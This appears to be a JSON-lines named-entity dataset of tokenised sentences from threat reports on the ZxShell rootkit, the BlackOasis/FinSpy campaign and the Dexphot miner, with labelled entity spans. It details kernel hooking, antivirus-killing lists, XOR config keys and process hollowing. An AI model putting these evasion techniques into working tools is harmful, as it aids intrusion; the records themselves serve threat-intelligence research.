{"text": "Finally it spawns 2 system threads .", "spans": {}, "info": {"id": "aptner_train_001692", "source": "aptner_train"}}
{"text": "The first thread is the “ communication ” thread .", "spans": {"System: communication": [[26, 39]]}, "info": {"id": "aptner_train_001693", "source": "aptner_train"}}
{"text": "ZxShell employs a strange method for communication : it hooks the NtWriteFile API and recognizes 5 different special handle values as commands :", "spans": {"Malware: ZxShell": [[0, 7]]}, "info": {"id": "aptner_train_001694", "source": "aptner_train"}}
{"text": "0x111111111 : Hide “ Loveusd ” driver from the system kernel driver list . 0x22222222 : Securely delete an in-use or no-access target file-name . 0x44444444 : Unhook the ZwWriteFile API and hook KiFastCallEntry . 0x55555555 : Remove the ZxShell Image Load Notify routine . 0x88888888 : Set a special value called “ type ” in Windows registry key HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\DriverMain .", "spans": {"Malware: ZxShell": [[237, 244]], "System: Windows": [[325, 332]]}, "info": {"id": "aptner_train_001695", "source": "aptner_train"}}
{"text": "The second Loveusd system thread does a lot of things .", "spans": {"System: Loveusd": [[11, 18]]}, "info": {"id": "aptner_train_001696", "source": "aptner_train"}}
{"text": "Its principal duties are to create the ZxShell main DLL in “ c:\\Windows\\System32\\commhlp32.dll ” and to install the Kernel “ Load Image Notify routine ” .", "spans": {"Malware: ZxShell": [[39, 46]], "System: DLL": [[52, 55]], "Indicator: c:\\Windows\\System32\\commhlp32.dll": [[61, 94]], "System: Load Image Notify routine": [[125, 150]]}, "info": {"id": "aptner_train_001697", "source": "aptner_train"}}
{"text": "The code then tries to kill each process and service that belongs to the following list of AV products : Symantec Firewall Norton ESET McAfee Avast Avira Sophos Malwarebytes .", "spans": {"System: Symantec Firewall": [[105, 122]], "System: Norton": [[123, 129]], "Organization: ESET": [[130, 134]], "Organization: McAfee": [[135, 141]], "System: Avast": [[142, 147]], "System: Avira": [[148, 153]], "Organization: Sophos": [[154, 160]], "System: Malwarebytes": [[161, 173]]}, "info": {"id": "aptner_train_001698", "source": "aptner_train"}}
{"text": "Next , the ZxShell Load-Image Notify function prevents the AV processes from restarting .", "spans": {"Malware: ZxShell": [[11, 18]]}, "info": {"id": "aptner_train_001699", "source": "aptner_train"}}
{"text": "The installation procedure continues in the user-mode dropper .", "spans": {}, "info": {"id": "aptner_train_001700", "source": "aptner_train"}}
{"text": "The ZxShell service is installed as usual , and the in-execution dropper is deleted permanently using the special handle value 0x22222222 for the WriteFile API call .", "spans": {"Malware: ZxShell": [[4, 11]]}, "info": {"id": "aptner_train_001701", "source": "aptner_train"}}
{"text": "This handle value is invalid : all the windows kernel handle values are by design a multiple of 4 .", "spans": {"System: windows": [[39, 46]]}, "info": {"id": "aptner_train_001702", "source": "aptner_train"}}
{"text": "The ZxShell hook code knows that and intercept it .", "spans": {"Malware: ZxShell": [[4, 11]]}, "info": {"id": "aptner_train_001703", "source": "aptner_train"}}
{"text": "ObReferenceObjectByHandle is a Kernel routine designed to validate a target object and return the pointer to its object body ( and even its handle information ) , starting from the object handle ( even the user-mode one ) .", "spans": {}, "info": {"id": "aptner_train_001704", "source": "aptner_train"}}
{"text": "The hook installed by ZxShell implements one of its filtering routine .", "spans": {"Malware: ZxShell": [[22, 29]]}, "info": {"id": "aptner_train_001705", "source": "aptner_train"}}
{"text": "It filters each attempt to open the ZxShell protected driver or the main DLL , returning a reference to the “ netstat.exe ” file .", "spans": {"Malware: ZxShell": [[36, 43]], "System: DLL": [[73, 76]], "Indicator: netstat.exe": [[110, 121]]}, "info": {"id": "aptner_train_001706", "source": "aptner_train"}}
{"text": "The protection is enabled to all processes except for ones in the following list : Svchost.exe , Lsass.exe , Winlogon.exe , Services.exe , Csrss.exe , ctfmon.exe , Rundll32.exe , mpnotify.exe , update.exe .", "spans": {"Indicator: Svchost.exe": [[83, 94]], "Indicator: Lsass.exe": [[97, 106]], "Indicator: Winlogon.exe": [[109, 121]], "Indicator: Services.exe": [[124, 136]], "Indicator: Csrss.exe": [[139, 148]], "Indicator: ctfmon.exe": [[151, 161]], "Indicator: Rundll32.exe": [[164, 176]], "Indicator: mpnotify.exe": [[179, 191]], "Indicator: update.exe": [[194, 204]]}, "info": {"id": "aptner_train_001707", "source": "aptner_train"}}
{"text": "If the type of the object that the system is trying to validate is a process , the hook code rewrites again the configuration data of the ZxShell service in the windows registry .", "spans": {"Malware: ZxShell": [[138, 145]], "System: windows": [[161, 168]]}, "info": {"id": "aptner_train_001708", "source": "aptner_train"}}
{"text": "The last type of Kernel modification that ZxShell rootkit performs is the system call dispatcher ( KiFastCallEntry ) hook .", "spans": {"Malware: ZxShell": [[42, 49]]}, "info": {"id": "aptner_train_001709", "source": "aptner_train"}}
{"text": "In this manner , ZxShell is able to completely hide itself , intercepting the following Kernel API calls : ZwAllocateVirtualMemory , ZwOpenEvent , ZwQueryDirectoryFile , ZwWriteFile , ZwEnumerateKey , and ZwDeviceIoControlFile .", "spans": {"Malware: ZxShell": [[17, 24]]}, "info": {"id": "aptner_train_001710", "source": "aptner_train"}}
{"text": "Command and Control Server : Sample ( SHA256 : 1eda7e556181e46ba6e36f1a6bfe18ff5566f9d5e51c53b41d08f9459342e26c ) is configured to act as a server .", "spans": {"System: Command and Control": [[0, 19]], "Indicator: 1eda7e556181e46ba6e36f1a6bfe18ff5566f9d5e51c53b41d08f9459342e26c": [[47, 111]]}, "info": {"id": "aptner_train_001711", "source": "aptner_train"}}
{"text": "The symbol “ g_bCreateListenSck ” is set to 1 .", "spans": {}, "info": {"id": "aptner_train_001712", "source": "aptner_train"}}
{"text": "This means that , as seen above , the ZxShell Dll is started in listening mode .", "spans": {"Malware: ZxShell": [[38, 45]], "System: Dll": [[46, 49]]}, "info": {"id": "aptner_train_001713", "source": "aptner_train"}}
{"text": "It connects to the first remote C&C that tries to contact it and succeeds in the handshake .", "spans": {"System: C&C": [[32, 35]]}, "info": {"id": "aptner_train_001714", "source": "aptner_train"}}
{"text": "The encrypted IP address is “ 127.0.0.2 ” ( used as loopback ) and no connection is made on that IP address ( due to the listening variable set to 1 ) .", "spans": {"Indicator: 127.0.0.2": [[30, 39]]}, "info": {"id": "aptner_train_001715", "source": "aptner_train"}}
{"text": "We used the ZxShell package for version 3.10 ( SHA256 : 1622460afbc8a255141256cb77af61c670ec21291df8fe0989c37852b59422b4 ).The convenient thing about this is that the CNC panel worked with any version , 3.10 and above .", "spans": {"Malware: ZxShell": [[12, 19]], "Indicator: 1622460afbc8a255141256cb77af61c670ec21291df8fe0989c37852b59422b4": [[56, 120]], "System: CNC panel": [[167, 176]]}, "info": {"id": "aptner_train_001716", "source": "aptner_train"}}
{"text": "The buttons are all in Chinese , with the help of Google Translate and keen detective skills ( read : button clicking ) , we ’ve deciphered the functionality .", "spans": {"System: Google Translate": [[50, 66]]}, "info": {"id": "aptner_train_001717", "source": "aptner_train"}}
{"text": "Once an infected machine connects , you see its information displayed in a selection box at the top .", "spans": {}, "info": {"id": "aptner_train_001718", "source": "aptner_train"}}
{"text": "There are some built in functions on the side for the more common features .", "spans": {}, "info": {"id": "aptner_train_001719", "source": "aptner_train"}}
{"text": "These include remote desktop , webcam spying , remote shell , and file management .", "spans": {}, "info": {"id": "aptner_train_001720", "source": "aptner_train"}}
{"text": "You can also select a host and type help for a full list of commands .", "spans": {}, "info": {"id": "aptner_train_001721", "source": "aptner_train"}}
{"text": "I have the same machine infected with two different version of ZxShell .", "spans": {"Malware: ZxShell": [[63, 70]]}, "info": {"id": "aptner_train_001722", "source": "aptner_train"}}
{"text": "Sending the help command for each , you can see the extra features added between version 3.1 and 3.2 .", "spans": {}, "info": {"id": "aptner_train_001723", "source": "aptner_train"}}
{"text": "Keylogging , ZXARPS ( IP and URL spoofing ) , and SYNFlood are some of the interesting features added to version 3.2 .", "spans": {"Malware: ZXARPS": [[13, 19]]}, "info": {"id": "aptner_train_001724", "source": "aptner_train"}}
{"text": "In versions 3.1 – 3.21, the configuration info is xor encoded with 0x85 .", "spans": {}, "info": {"id": "aptner_train_001725", "source": "aptner_train"}}
{"text": "This configuration info can be changed with a tool included in the ZxShell package .", "spans": {"Malware: ZxShell": [[67, 74]]}, "info": {"id": "aptner_train_001726", "source": "aptner_train"}}
{"text": "In versions 3.22 and 3.39 the routine changes .", "spans": {}, "info": {"id": "aptner_train_001727", "source": "aptner_train"}}
{"text": "The new xor encoding byte is 0x5B .", "spans": {}, "info": {"id": "aptner_train_001728", "source": "aptner_train"}}
{"text": "The data is stored in the last 0x100 bytes of the file .", "spans": {}, "info": {"id": "aptner_train_001729", "source": "aptner_train"}}
{"text": "The first 8 bytes of data are static .", "spans": {}, "info": {"id": "aptner_train_001730", "source": "aptner_train"}}
{"text": "Then there is the dll install name , the domain , and the port .", "spans": {"System: dll": [[18, 21]]}, "info": {"id": "aptner_train_001731", "source": "aptner_train"}}
{"text": "Knowing the obfuscation routines for this data we wrote a script to extract the URLs / IPs and ports stored .", "spans": {}, "info": {"id": "aptner_train_001732", "source": "aptner_train"}}
{"text": "The most common ports used are , 80, 1985, 1986, and 443 . 1985 is the default port for the malware , 1986 is the lazy variation of that port .", "spans": {}, "info": {"id": "aptner_train_001733", "source": "aptner_train"}}
{"text": "Port 80 and 443 are the default ports for HTTP and HTTPS traffic .", "spans": {}, "info": {"id": "aptner_train_001734", "source": "aptner_train"}}
{"text": "The next most common is port 53 .", "spans": {}, "info": {"id": "aptner_train_001735", "source": "aptner_train"}}
{"text": "This is used in some of the newer 3.22 and 3.39 samples .", "spans": {}, "info": {"id": "aptner_train_001736", "source": "aptner_train"}}
{"text": "After that , the count for each port starts declining sharply .", "spans": {}, "info": {"id": "aptner_train_001737", "source": "aptner_train"}}
{"text": "The choices are interesting though , many correspond to what looks like the birth year of the controller ( ie . years in the late 1980s and early 1990s ) , and others seem to match what year the malware was launched in ( ie . in the 2000s , relatively close to the current year ) .", "spans": {}, "info": {"id": "aptner_train_001738", "source": "aptner_train"}}
{"text": "Since this malware dates back to around 2004 , there are many samples containing CNC URLs from the 3322.org page .", "spans": {"System: CNC": [[81, 84]], "Indicator: 3322.org": [[99, 107]]}, "info": {"id": "aptner_train_001739", "source": "aptner_train"}}
{"text": "This page used to offer no-ip type hosting and was widely used by malware authors .", "spans": {}, "info": {"id": "aptner_train_001740", "source": "aptner_train"}}
{"text": "So much so that Microsoft did a takedown in 2012 .", "spans": {"Organization: Microsoft": [[16, 25]]}, "info": {"id": "aptner_train_001741", "source": "aptner_train"}}
{"text": "A similar service , vicp.net , is also seen in many of the domains .", "spans": {"Indicator: vicp.net": [[20, 28]]}, "info": {"id": "aptner_train_001742", "source": "aptner_train"}}
{"text": "In the malware , if a domain is configured , it will retrieve domain.tld / myIP .", "spans": {"Indicator: domain.tld": [[62, 72]]}, "info": {"id": "aptner_train_001743", "source": "aptner_train"}}
{"text": "txt .", "spans": {"Indicator: txt": [[0, 3]]}, "info": {"id": "aptner_train_001744", "source": "aptner_train"}}
{"text": "This file contains a list of IP addresses for the infected machine to connect back to .", "spans": {}, "info": {"id": "aptner_train_001745", "source": "aptner_train"}}
{"text": "Otherwise , if an IP address is configured , it will connect directly to that IP address .", "spans": {}, "info": {"id": "aptner_train_001746", "source": "aptner_train"}}
{"text": "We have written a simple C++ ZxShell Server that implements the communication and the handshake for the version 3.10 and 3.20 of the ZxShell DLL .", "spans": {"Malware: ZxShell": [[29, 36], [133, 140]], "System: DLL": [[141, 144]]}, "info": {"id": "aptner_train_001747", "source": "aptner_train"}}
{"text": "The implementation is quite simple : After the handshake , 2 threads that deal with data transfer are spawned .", "spans": {}, "info": {"id": "aptner_train_001748", "source": "aptner_train"}}
{"text": "Advanced persistent threats will remain a problem for companies and organizations of all sizes , especially those with high financial or intellectual property value .", "spans": {}, "info": {"id": "aptner_train_001749", "source": "aptner_train"}}
{"text": "Group 72 ’s involvement in Operation SMN is another example of what sort of damage that can be done if organizations are not diligent in their efforts to secure their networks .", "spans": {"Organization: Group 72": [[0, 8]]}, "info": {"id": "aptner_train_001750", "source": "aptner_train"}}
{"text": "ZxShell is one sample amongst several tools that Group 72 used within their campaign .", "spans": {"Malware: ZxShell": [[0, 7]], "Organization: Group 72": [[49, 57]]}, "info": {"id": "aptner_train_001751", "source": "aptner_train"}}
{"text": "ZxShell is a sophisticated tool employed by Group 72 that contains all kinds of functionality .", "spans": {"Malware: ZxShell": [[0, 7]], "Organization: Group 72": [[44, 52]]}, "info": {"id": "aptner_train_001752", "source": "aptner_train"}}
{"text": "Its detection and removal can be difficult due to the various techniques used to conceal its presence , such as disabling the host anti-virus , masking its installation on a system with a valid service name , and by masking outbound traffic as originating from a web browser .", "spans": {}, "info": {"id": "aptner_train_001753", "source": "aptner_train"}}
{"text": "While other techniques are also utilized to conceal and inhibit its removal , ZxShell ’s primary functionality is to act as a Remote Administration Tool ( RAT ) , allowing the threat actor to have continuous backdoor access on to the compromised machine .", "spans": {"Malware: ZxShell": [[78, 85]], "System: Remote Administration Tool": [[126, 152]], "System: RAT": [[155, 158]], "Malware: backdoor": [[208, 216]]}, "info": {"id": "aptner_train_001754", "source": "aptner_train"}}
{"text": "As our analysis demonstrates , ZxShell is an effective tool that can be ultimately used to steal user credentials and other highly valuable information .", "spans": {"Malware: ZxShell": [[31, 38]]}, "info": {"id": "aptner_train_001755", "source": "aptner_train"}}
{"text": "The threat posed by ZxShell to organizations is one that cannot be ignored .", "spans": {"Malware: ZxShell": [[20, 27]]}, "info": {"id": "aptner_train_001756", "source": "aptner_train"}}
{"text": "Organizations with high financial or intellectual property value should take the time to ensure their security requirements are met and that employee ’s are educated about the security threats their organizations face .", "spans": {}, "info": {"id": "aptner_train_001757", "source": "aptner_train"}}
{"text": "Threat Spotlight : Group 72 , Opening the ZxShell .", "spans": {"Organization: Group 72": [[19, 27]], "Malware: ZxShell": [[42, 49]]}, "info": {"id": "aptner_train_001758", "source": "aptner_train"}}
{"text": "The incident , as described by security researchers with Moscow-based cybersecurity firm Kaspersky Lab , shines a rare light on the opaque although apparently vibrant market for software exploits and spyware , which in this case appears to have been purchased by a nation-state .", "spans": {"Organization: Kaspersky Lab": [[89, 102]], "Malware: spyware": [[200, 207]]}, "info": {"id": "aptner_train_001760", "source": "aptner_train"}}
{"text": "The Middle Eastern hacker group in this case is codenamed “ BlackOasis . ” Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of “ FinSpy ” malware , according to a new blog post published Monday .", "spans": {"Organization: BlackOasis": [[60, 70]], "Organization: Kaspersky": [[75, 84]], "System: Adobe Flash Player": [[118, 136]], "Vulnerability: zero-day": [[137, 145]], "Vulnerability: CVE-2016-4117": [[162, 175]], "Malware: FinSpy": [[222, 228]]}, "info": {"id": "aptner_train_001761", "source": "aptner_train"}}
{"text": "Adobe issued a fix Monday to its users in the form of a software update .", "spans": {"Organization: Adobe": [[0, 5]]}, "info": {"id": "aptner_train_001762", "source": "aptner_train"}}
{"text": "These emails contained malicious Microsoft Word documents with the aforementioned Flash Player zero-day hidden inside an embedded ActiveX object .", "spans": {"System: emails": [[6, 12]], "System: Microsoft Word documents": [[33, 57]], "Vulnerability: Flash Player zero-day": [[82, 103]], "System: ActiveX object": [[130, 144]]}, "info": {"id": "aptner_train_001765", "source": "aptner_train"}}
{"text": "The term zero-day is indicative of a software flaw that remains unknown to the software ’s creator .", "spans": {"Vulnerability: zero-day": [[9, 17]]}, "info": {"id": "aptner_train_001767", "source": "aptner_train"}}
{"text": "Zero-days can be highly disruptive because they provide a window of time for an attacker to breach victims before the vendor is able to apply a software update to address the specific security hole .", "spans": {"Vulnerability: Zero-days": [[0, 9]]}, "info": {"id": "aptner_train_001768", "source": "aptner_train"}}
{"text": "U.S . cybersecurity firm FireEye also recently captured BlackOasis activity as part of a similar incident where the group relied on a different zero-day exploit — more specifically , a SOAP WSDL parser code injection vulnerability — to install FinSpy onto a small number of devices .", "spans": {"Organization: FireEye": [[25, 32]], "Organization: BlackOasis": [[56, 66]], "Vulnerability: zero-day": [[144, 152]], "System: SOAP WSDL": [[185, 194]], "Malware: FinSpy": [[244, 250]]}, "info": {"id": "aptner_train_001769", "source": "aptner_train"}}
{"text": "Again , the attacker ’s intention appeared to be espionage . “ Unlike other FinFisher customers or users who focus mostly on domestic operations , BlackOasis focuses on external operations and go after a wide range of targets around the world , ” explained Costin Raiu , director of the global research and analysis team at Kaspersky Lab .", "spans": {"Organization: FinFisher": [[76, 85]], "Organization: BlackOasis": [[147, 157]], "Organization: Kaspersky Lab": [[324, 337]]}, "info": {"id": "aptner_train_001770", "source": "aptner_train"}}
{"text": "Gamma Group has been accused of selling its products to authoritarian regimes that can use the technology to both track dissidents and conduct foreign espionage over the internet .", "spans": {"Organization: Gamma Group": [[0, 11]]}, "info": {"id": "aptner_train_001771", "source": "aptner_train"}}
{"text": "It ’s unclear whether the hackers are purchasing the exploits and spyware together , directly from Gamma Group , or if they were able to acquire some of the tools through other avenues . “ BlackOasis ’ interests span a wide gamut of figures involved in Middle Eastern politics and verticals disproportionately relevant to the region .", "spans": {"Malware: spyware": [[66, 73]], "Organization: Gamma Group": [[99, 110]], "Organization: BlackOasis": [[189, 199]]}, "info": {"id": "aptner_train_001773", "source": "aptner_train"}}
{"text": "This includes prominent figures in the United Nations , opposition bloggers and activists , and regional news correspondents , ” a blogpost about Kaspersky ’s findings reads .", "spans": {"Organization: Kaspersky": [[146, 155]]}, "info": {"id": "aptner_train_001774", "source": "aptner_train"}}
{"text": "The post continues , “ during 2016 , we observed a heavy interest in Angola , exemplified by lure documents indicating targets with suspected ties to oil , money laundering , and other illicit activities .", "spans": {}, "info": {"id": "aptner_train_001775", "source": "aptner_train"}}
{"text": "There is also an interest in international activists and think tanks … Victims of BlackOasis have been observed in the following countries : Russia , Iraq , Afghanistan , Nigeria , Libya , Jordan , Tunisia , Saudi Arabia , Iran , Netherlands , Bahrain , United Kingdom and Angola . ”", "spans": {"Organization: BlackOasis": [[82, 92]]}, "info": {"id": "aptner_train_001776", "source": "aptner_train"}}
{"text": "Intent was clearly espionage in many cases , going outside of that \"lawful surveillance\" boundary.— Brian Bartholomew ( @Mao_Ware ) October 16, 2017 Brian Bartholomew , a senior security researcher with Kaspersky , said on Twitter that BlackOasis ’ espionage included non-traditional targets — “ going outside of that lawful surveillance boundary. ”", "spans": {"Organization: Kaspersky": [[203, 212]], "System: Twitter": [[223, 230]], "Organization: BlackOasis": [[236, 246]]}, "info": {"id": "aptner_train_001777", "source": "aptner_train"}}
{"text": "An advanced persistent threat group , previously identified by Microsoft and codenamed Neodymium , is closely associated with BlackOasis ’ operations .", "spans": {"Organization: Microsoft": [[63, 72]], "Organization: Neodymium": [[87, 96]], "Organization: BlackOasis": [[126, 136]]}, "info": {"id": "aptner_train_001778", "source": "aptner_train"}}
{"text": "Last year , Microsoft researchers described Neodymium ’s behavior as unusual : “ unlike many activity groups , which typically gather information for monetary gain or economic espionage , PROMETHIUM and NEODYMIUM appear to launch campaigns simply to gather information about certain individuals .", "spans": {"Organization: Microsoft": [[12, 21]], "Organization: Neodymium": [[44, 53]], "Organization: PROMETHIUM": [[188, 198]], "Organization: NEODYMIUM": [[203, 212]]}, "info": {"id": "aptner_train_001779", "source": "aptner_train"}}
{"text": "These activity groups are also unusual in that they use the same zero-day exploit to launch attacks at around the same time in the same region .", "spans": {"Vulnerability: zero-day": [[65, 73]]}, "info": {"id": "aptner_train_001780", "source": "aptner_train"}}
{"text": "Their targets , however , appear to be individuals that do not share common affiliations. ”", "spans": {}, "info": {"id": "aptner_train_001781", "source": "aptner_train"}}
{"text": "A cursory review of BlackOasis ’ espionage campaign suggests there is some overlap between the group ’s actions and Saudi Arabia ’s geopolitical interests .", "spans": {"Organization: BlackOasis": [[20, 30]]}, "info": {"id": "aptner_train_001782", "source": "aptner_train"}}
{"text": "For example , the targeting of Angolan organizations in mid-2016 coincidences directly with the rise of Angola ’s oil business with China , which displaced Saudi Arabia as the number one exporter of crude oil to China at the time .", "spans": {"Organization: Angolan organizations": [[31, 52]]}, "info": {"id": "aptner_train_001783", "source": "aptner_train"}}
{"text": "In addition , Saudi Arabia is a known customer of spyware and has used the technology domestically , according to Citizen Lab , a cybersecurity and human-rights focused research laboratory .", "spans": {"Malware: spyware": [[50, 57]], "Organization: Citizen Lab": [[114, 125]]}, "info": {"id": "aptner_train_001785", "source": "aptner_train"}}
{"text": "Kaspersky ’s research notes that BlackOasis hacked into computers based in Saudi Arabia .", "spans": {"Organization: Kaspersky": [[0, 9]], "Organization: BlackOasis": [[33, 43]]}, "info": {"id": "aptner_train_001786", "source": "aptner_train"}}
{"text": "Insights from one year of tracking a polymorphic threat .", "spans": {}, "info": {"id": "aptner_train_001787", "source": "aptner_train"}}
{"text": "A little over a year ago , in October 2018 , our polymorphic outbreak monitoring system detected a large surge in reports , indicating that a large-scale campaign was unfolding .", "spans": {}, "info": {"id": "aptner_train_001788", "source": "aptner_train"}}
{"text": "We observed as the new threat attempted to deploy files that changed every 20-30 minutes on thousands of devices .", "spans": {}, "info": {"id": "aptner_train_001789", "source": "aptner_train"}}
{"text": "We gave the threat the name “ Dexphot , ” based on certain characteristics of the malware code .", "spans": {"Malware: Dexphot": [[30, 37]]}, "info": {"id": "aptner_train_001790", "source": "aptner_train"}}
{"text": "The Dexphot attack used a variety of sophisticated methods to evade security solutions .", "spans": {"Malware: Dexphot": [[4, 11]]}, "info": {"id": "aptner_train_001791", "source": "aptner_train"}}
{"text": "Layers of obfuscation , encryption , and the use of randomized file names hid the installation process .", "spans": {}, "info": {"id": "aptner_train_001792", "source": "aptner_train"}}
{"text": "Dexphot then used fileless techniques to run malicious code directly in memory , leaving only a few traces that can be used for forensics .", "spans": {"Malware: Dexphot": [[0, 7]]}, "info": {"id": "aptner_train_001793", "source": "aptner_train"}}
{"text": "It hijacked legitimate system processes to disguise malicious activity .", "spans": {}, "info": {"id": "aptner_train_001794", "source": "aptner_train"}}
{"text": "If not stopped , Dexphot ultimately ran a cryptocurrency miner on the device , with monitoring services and scheduled tasks triggering re-infection when defenders attempt to remove the malware .", "spans": {"Malware: Dexphot": [[17, 24]]}, "info": {"id": "aptner_train_001795", "source": "aptner_train"}}
{"text": "In the months that followed , we closely tracked the threat and witnessed the attackers upgrade the malware , target new processes , and work around defensive measures .", "spans": {}, "info": {"id": "aptner_train_001796", "source": "aptner_train"}}
{"text": "While Microsoft Defender Advanced Threat Protection ’s pre-execution detection engines blocked Dexphot in most cases , behavior-based machine learning models provided protection for cases where the threat slipped through .", "spans": {"System: Microsoft Defender Advanced Threat Protection": [[6, 51]], "Malware: Dexphot": [[95, 102]]}, "info": {"id": "aptner_train_001797", "source": "aptner_train"}}
{"text": "Given the threat ’s persistence mechanisms , polymorphism , and use of fileless techniques , behavior-based detection was a critical component of the comprehensive protection against this malware and other threats that exhibit similar malicious behaviors .", "spans": {}, "info": {"id": "aptner_train_001798", "source": "aptner_train"}}
{"text": "Microsoft Defender ATP data shows the effectiveness of behavioral blocking and containment capabilities in stopping the Dexphot campaign .", "spans": {"System: Microsoft Defender": [[0, 18]], "Malware: Dexphot": [[120, 127]]}, "info": {"id": "aptner_train_001799", "source": "aptner_train"}}
{"text": "Over time , Dexphot-related malicious behavior reports dropped to a low hum , as the threat lost steam .", "spans": {}, "info": {"id": "aptner_train_001800", "source": "aptner_train"}}
{"text": "Our close monitoring of Dexphot helped us ensure that our customers were protected from the evolving threat .", "spans": {"Malware: Dexphot": [[24, 31]]}, "info": {"id": "aptner_train_001801", "source": "aptner_train"}}
{"text": "More importantly , one year ’s worth of intelligence helped us gain insight not only into the goals and motivations of Dexphot ’s authors , but of cybercriminals in general .", "spans": {"Malware: Dexphot": [[119, 126]]}, "info": {"id": "aptner_train_001802", "source": "aptner_train"}}
{"text": "The early stages of a Dexphot infection involves numerous files and processes .", "spans": {"Malware: Dexphot": [[22, 29]]}, "info": {"id": "aptner_train_001803", "source": "aptner_train"}}
{"text": "During the execution stage , Dexphot writes five key files to disk :", "spans": {}, "info": {"id": "aptner_train_001804", "source": "aptner_train"}}
{"text": "1 、An installer with two URLs ;", "spans": {}, "info": {"id": "aptner_train_001805", "source": "aptner_train"}}
{"text": "2 、An MSI package file downloaded from one of the URLs ;", "spans": {"System: MSI": [[6, 9]]}, "info": {"id": "aptner_train_001806", "source": "aptner_train"}}
{"text": "3 、A password-protected ZIP archive ;", "spans": {}, "info": {"id": "aptner_train_001807", "source": "aptner_train"}}
{"text": "4 、A loader DLL , which is extracted from the archive ;", "spans": {"System: DLL": [[12, 15]]}, "info": {"id": "aptner_train_001808", "source": "aptner_train"}}
{"text": "5 、An encrypted data file that holds three additional executables that are loaded into system processes via process hollowing .", "spans": {}, "info": {"id": "aptner_train_001809", "source": "aptner_train"}}
{"text": "Except for the installer , the other processes that run during execution are legitimate system processes .", "spans": {}, "info": {"id": "aptner_train_001810", "source": "aptner_train"}}
{"text": "This can make detection and remediation more difficult .", "spans": {}, "info": {"id": "aptner_train_001811", "source": "aptner_train"}}
{"text": "These legitimate system processes include msiexec.exe ( for installing MSI packages ) , unzIP .", "spans": {"Indicator: msiexec.exe": [[42, 53]], "System: MSI": [[71, 74]], "System: unzIP": [[88, 93]]}, "info": {"id": "aptner_train_001812", "source": "aptner_train"}}
{"text": "exe ( for extracting files from the password-protected ZIP archive ) , rundll32.exe ( for loading the loader DLL ) , schtasks.exe ( for scheduled tasks ) , powershell.exe ( for forced updates ) .", "spans": {"Indicator: exe": [[0, 3]], "Indicator: rundll32.exe": [[71, 83]], "System: DLL": [[109, 112]], "Indicator: schtasks.exe": [[117, 129]], "Indicator: powershell.exe": [[156, 170]]}, "info": {"id": "aptner_train_001813", "source": "aptner_train"}}
{"text": "In later stages , Dexphot targets a few other system processes for process hollowing : svchost.exe , tracert.exe , and setup.exe .", "spans": {"Malware: Dexphot": [[18, 25]], "Indicator: svchost.exe": [[87, 98]], "Indicator: tracert.exe": [[101, 112]], "Indicator: setup.exe": [[119, 128]]}, "info": {"id": "aptner_train_001814", "source": "aptner_train"}}
{"text": "Based on Microsoft Defender ATP signals , SoftwareBundler : Win32/ICLoader and its variants are primarily used to drop and run the Dexphot installer .", "spans": {"System: Microsoft Defender": [[9, 27]], "Malware: SoftwareBundler : Win32/ICLoader": [[42, 74]], "Malware: Dexphot installer": [[131, 148]]}, "info": {"id": "aptner_train_001815", "source": "aptner_train"}}
{"text": "The installer uses two URLs to download malicious payloads .", "spans": {}, "info": {"id": "aptner_train_001816", "source": "aptner_train"}}
{"text": "These are the same two URLs that Dexphot use later to establish persistence , update the malware , and re-infect the device .", "spans": {"Malware: Dexphot": [[33, 40]]}, "info": {"id": "aptner_train_001817", "source": "aptner_train"}}
{"text": "The installer downloads an MSI package from one of the two URLs , and then launches msiexec.exe to perform a silent install .", "spans": {"System: MSI": [[27, 30]], "Indicator: msiexec.exe": [[84, 95]]}, "info": {"id": "aptner_train_001818", "source": "aptner_train"}}
{"text": "This is the first of several instances of Dexphot employing living-off-the-land techniques , the use of legitimate system processes for nefarious purposes .", "spans": {"Malware: Dexphot": [[42, 49]]}, "info": {"id": "aptner_train_001819", "source": "aptner_train"}}
{"text": "Dexphot ’s package often contains an obfuscated batch script .", "spans": {"Malware: Dexphot": [[0, 7]]}, "info": {"id": "aptner_train_001820", "source": "aptner_train"}}
{"text": "If the package contains this file , the script is the first thing that msiexec.exe runs when it begins the installation process .", "spans": {"Indicator: msiexec.exe": [[71, 82]]}, "info": {"id": "aptner_train_001821", "source": "aptner_train"}}
{"text": "The said obfuscated script is designed to check for antivirus products .", "spans": {}, "info": {"id": "aptner_train_001822", "source": "aptner_train"}}
{"text": "Dexphot halts the infection process immediately if an antivirus product is found running .", "spans": {"Malware: Dexphot": [[0, 7]]}, "info": {"id": "aptner_train_001823", "source": "aptner_train"}}
{"text": "When we first began our research , the batch script only checked for antivirus products from Avast and AVG .", "spans": {"System: Avast": [[93, 98]], "System: AVG": [[103, 106]]}, "info": {"id": "aptner_train_001824", "source": "aptner_train"}}
{"text": "Later , Windows Defender Antivirus was added to the checklist .", "spans": {"System: Windows Defender Antivirus": [[8, 34]]}, "info": {"id": "aptner_train_001825", "source": "aptner_train"}}
{"text": "If the process is not halted , Dexphot decompresses the password-protected ZIP archive from the MSI package .", "spans": {"Malware: Dexphot": [[31, 38]], "System: MSI": [[96, 99]]}, "info": {"id": "aptner_train_001826", "source": "aptner_train"}}
{"text": "The password to this archive is within the MSI package .", "spans": {"System: MSI": [[43, 46]]}, "info": {"id": "aptner_train_001827", "source": "aptner_train"}}
{"text": "Along with the password , the malware ’s authors also include a clean version of unzIP .", "spans": {"System: unzIP": [[81, 86]]}, "info": {"id": "aptner_train_001828", "source": "aptner_train"}}
{"text": "exe so that they do n’t have to rely on the target system having a ZIP utility .", "spans": {"Indicator: exe": [[0, 3]], "System: ZIP utility": [[67, 78]]}, "info": {"id": "aptner_train_001829", "source": "aptner_train"}}
{"text": "The unzIP .", "spans": {"System: unzIP": [[4, 9]]}, "info": {"id": "aptner_train_001830", "source": "aptner_train"}}
{"text": "exe file in the package is usually named various things , such as z.exe or ex.exe , to avoid scrutiny .", "spans": {"Indicator: exe": [[0, 3]], "Indicator: z.exe": [[66, 71]], "Indicator: ex.exe": [[75, 81]]}, "info": {"id": "aptner_train_001831", "source": "aptner_train"}}
{"text": "The ZIP archive usually contains three files : the loader DLL , an encrypted data file ( usually named bin.dat ) , and , often , one clean unrelated DLL , which is likely included to mislead detection .", "spans": {"System: the loader DLL": [[47, 61]], "Indicator: bin.dat": [[103, 110]], "System: clean unrelated DLL": [[133, 152]]}, "info": {"id": "aptner_train_001832", "source": "aptner_train"}}
